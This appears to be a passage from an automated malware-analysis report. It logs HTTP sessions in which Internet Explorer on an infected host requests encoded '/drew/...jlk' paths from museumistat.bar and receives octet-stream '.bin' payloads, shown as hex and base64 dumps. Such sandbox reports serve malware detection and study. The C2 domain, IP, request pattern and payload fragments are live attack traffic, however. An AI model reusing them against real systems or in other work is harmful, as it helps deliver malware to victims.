                  Data Ascii: QYGZYy9HW/sN5QjdBAunTNqtusm2LCTN3LeRISeyxnHtg10njnRiHx8Lige7+zQL2W8e9auCaJApdA+C4VR18j78cZ2mPeOYuvaQD5Rg6TM3AAttXdZtdbBB6ykmO0wuGjuBY9lGE+pJEtVtE8LkVrWYv4mxg1BQNWYrloxcwiT2+7d+tyYXiovpUoSoLQTL+f2EybjX1E3rMe4T6F+RBJPUWv1P1JJfpPc/Ar26H4/fMieoldaEeE6OZayeaJ9eIxNDO7D7c/Rw/g0rtJZBd57H8snQVT45kCetLQhJIN3o/szkANEUB6aIPhQsBNjRcYyLc133q0yzEoykyofrTrTQ4QoHT921OhdI7N0qIezbwCfqT8VFcC23YjXZ7ZVUFZuIIl90Y9KuyvS65u6XgzNQt5HMGOFYpmflOifh+IzAMrT03IqTCPdOhWEpjbkJc5kKuUQsQlaRoU36IAV3ohBn1ImIFY2leqR5TlQ9ZOHaEHa6QNgnEG6xbnNJ2+UY7JiDiQjBZrCb7+GhxnZSFhtfAcMU2XcGwwV2uJoIxt7vL8F9TlhRMmA/RzR6Vt8xZf9RkR3e1p9toFZ3o4cHYUv3InWCqPsBnojH8xEM0VbjheBXoaxhBQ9Z6/fxn/2HcXrb1c8ib6luEKnWdCL6uzlHzcBkMaODD0YZcpkiWs/6sgYIaF3dYoRZQYDURN6vLzBtXtZMBaUWrohQdTdn4uzJjcnwBLnvPyO+TFuCNjXMiT2Gy/j/Hp3lWXfRHojjehpOcJapWiupnadbquxGn60XhlEawJcb0p9styzM6ocaCAdtOVtvHH7NeRQts+hJ5GP80Vv1Zc/Xr3lUljO1dutyvj7rudr6gji9V1Ej152ueQwUA3hjCMdpGGxrnWcxqPTtIqSG6QVV8puZPSV5K8uDFCS1Q/JcE+vlsTRPtICHru4D8KN/gNfmLY6KlY0w/uUa5aHEjhaDlVbo+Nz0QVn+HE/mL7or7gD
                  Jan 19, 2022 11:50:28.707902908 CET1368OUTGET /favicon.ico HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:28.855721951 CET1369INHTTP/1.1 404 Not Found
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:28 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.34975131.41.44.380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 19, 2022 11:50:30.910902977 CET1370OUTGET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:31.236540079 CET1371INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:31 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf72c368.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Data Ascii: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A7
                  Jan 19, 2022 11:50:31.859704971 CET1703OUTGET /favicon.ico HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:32.015045881 CET1704INHTTP/1.1 404 Not Found
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:31 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                  Jan 19, 2022 11:50:33.094543934 CET1732OUTGET /drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:33.448621988 CET2227INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf95f22c.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76
                  Data Ascii: Si70EpXF3DtKETRp+ZGY2TxEJmAt3QotOI6e8niT0CEQwmUK9nwSKIDm8Yy3IXHuqSjJe6XmHNyDM+rf9QnSxJFKIP9tRRsokIExMFQpCOU8UJd91M1SjTfbliEK+hAzl7BjZ20WBpIP+SmwVpi1gbrUKPBRVPodw7DZ5lbLzKoHTe4ZTvBlSBpujTEuMr/D0D89jMmzJpbhDHWepb5xcuxZrKZeQG3CJmAn5JiS8ic3fttpjjIJ3YpsakEuFQYlNxhB+2IbF/qNswI/IdzlWRFBbTMzGf1bNy6v1Ky4QV6eJwNjsllL09iPkx0RvY7udz310UzfzmhFLeFAY7ytl75zYHlTUi+0OnLWEc8Fusanm+WFsyVVDYuhfbZiJcnDKW1CTja8I7SqvQ5RYMFGChmK4XG+cn8vdvwGw9Q2a7iMywG2gVilGcs2+flECgVRbDNgo/06m3NBtsTEBtcdILFI/0kRN8LXvqZJe+eL9ZaX/Z5mGwUE++jvEQOdmq4Gq3dmIsBWyErPbY0LzVyoEyIAQBt8g+rszllaX8i24EUIDitZIAHCMpx3VUSuvkjaC//uzCeSjl6fxKg0pUbcNoTRDgg8B5XeP8xiKZ6RDobn5e3U+XiEImRVJexoUceFIr0in/B5b0j9bujna40rxWP9jK7Wh0eVSEz0RVAC4jF2T7uM8A4YLhpWY5V3LM7NGvoaAop5MEkr7SWC9MiEB1CJHc2WKnv7u7i/SMRwurjov4MWyMFps/sb0+Hnz7G6Aa4H2ge34iz46NCKCjMQrs8ruUJnpTY2JtVHsDh9g+t2GxU7nE/ydYijptGP4Y3gRvZNZRVFqjyFE7Hqq9lReXJMOshq33G/s9Pg7f1LqSkj61TBO8oGX81Eihxi0QwspqAO1fG5bhTCEIaW0SpCgC5jHaAEIdVeAUU2DoR7ZrfuATlmB/JgR8+lzUQudymr5SyRANWJZVfs211sXoAVXEBkvIw6d750suUGv


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.34975231.41.44.380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 19, 2022 11:50:32.709522963 CET1705OUTGET /drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:33.035336971 CET1707INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf8ef324.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Data Ascii: QYGZYy9HW/sN5QjdBAunTNqtusm2LCTN3LeRISeyxnHtg10njnRiHx8Lige7+zQL2W8e9auCaJApdA+C4VR18j78cZ2mPeOYuvaQD5Rg6TM3AAttXdZtdbBB6ykmO0wuGjuBY9lGE+pJEtVtE8LkVrWYv4mxg1BQNWYrloxcwiT2+7d+tyYXiovpUoSoLQTL+f2EybjX1E3rMe4T6F+RBJPUWv1P1JJfpPc/Ar26H4/fMieoldaEeE6OZayeaJ9eIxNDO7D7c/Rw/g0rtJZBd57H8snQVT45kCetLQhJIN3o/szkANEUB6aIPhQsBNjRcYyLc133q0yzEoykyofrTrTQ4QoHT921OhdI7N0qIezbwCfqT8VFcC23YjXZ7ZVUFZuIIl90Y9KuyvS65u6XgzNQt5HMGOFYpmflOifh+IzAMrT03IqTCPdOhWEpjbkJc5kKuUQsQlaRoU36IAV3ohBn1ImIFY2leqR5TlQ9ZOHaEHa6QNgnEG6xbnNJ2+UY7JiDiQjBZrCb7+GhxnZSFhtfAcMU2XcGwwV2uJoIxt7vL8F9TlhRMmA/RzR6Vt8xZf9RkR3e1p9toFZ3o4cHYUv3InWCqPsBnojH8xEM0VbjheBXoaxhBQ9Z6/fxn/2HcXrb1c8ib6luEKnWdCL6uzlHzcBkMaODD0YZcpkiWs/6sgYIaF3dYoRZQYDURN6vLzBtXtZMBaUWrohQdTdn4uzJjcnwBLnvPyO+TFuCNjXMiT2Gy/j/Hp3lWXfRHojjehpOcJapWiupnadbquxGn60XhlEawJcb0p9styzM6ocaCAdtOVtvHH7NeRQts+hJ5GP80Vv1Zc/Xr3lUljO1dutyvj7rudr6gji9V1Ej152ueQwUA3hjCMdpGGxrnWcxqPTtIqSG6QVV8puZPSV5K8uDFCS1Q/JcE+vlsTRPtICHru4D8KN/gNfmLY6KlY0w/uUa5aHEjhaDlVbo+Nz0QVn+HE/mL7or7gD
                  Jan 19, 2022 11:50:34.706244946 CET2229OUTGET /drew/1_2Ff_2F9oFy50B/NUoWO_2FDz5xIg76q9/VveqFFcWO/HyFzcq3OFY_2BhIPCNw9/sIpk4tVFJ9VOtR2TNQU/et11cPI71f_2FqTVA64vkQ/ypIbEDHfIxxsr/MyPGmlo5/aegiD19qzpHWbW06aGHN_2F/zeC5Le5Fpu/swEVOnWdXMP11BFlG/5EITeJo9mr75/6dBXeBOslAr/PXd6axM5Td1aIF/iXDTVhWGdUnCVcgEXpRpk/4zChmYsnqrQ_2F/X48.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:35.020828009 CET2231INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:34 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfaebed4.bin"
